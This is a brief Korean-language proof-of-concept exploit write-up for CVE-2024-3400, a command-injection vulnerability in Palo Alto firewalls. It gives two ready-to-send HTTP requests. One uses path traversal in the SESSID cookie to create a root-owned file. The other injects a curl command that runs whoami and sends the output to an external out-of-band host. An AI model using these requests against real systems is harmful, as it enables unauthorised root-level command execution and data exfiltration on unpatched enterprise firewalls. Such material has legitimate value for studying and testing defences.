
CVE-2024-3400에 대한 개념 증명 익스플로잇으로, Palo Alto 방화벽의 명령 주입 취약점을 악용하여 조작된 HTTP 요청을 통해 파일 생성 및 원격 명령 실행을 시연합니다.
CVE-2024-3400은 Palo Alto 방화벽 시스템에 존재하는 명령 주입 취약점입니다. 공격자는 정교하게 구성된 HTTP 요청을 통해 대상 서버에서 악성 명령을 실행하고, 심지어 root 권한을 획득할 수 있습니다.
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/hellome1337.txt;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
이 요청을 전송한 후, 서버에 hellome1337.txt라는 파일이 생성되며 해당 파일은 root 권한을 갖게 됩니다.
스크린샷은 이 취약점 악용 과정의 효과를 보여줍니다:


이 취약점을 악용하여 명령 주입을 실행하려면 다음과 같은 HTTP 요청을 전송할 수 있습니다:
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/minute/h4`curl${IFS}xxxxxxxxxxxxxxxxx.oast.fun?test=$(whoami)`;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
이 요청은 서버에서 whoami 명령을 실행하고, 결과를 지정된 원격 서버(예: xxxxxxxxxxxxxxxxx.oast.fun)로 전송합니다.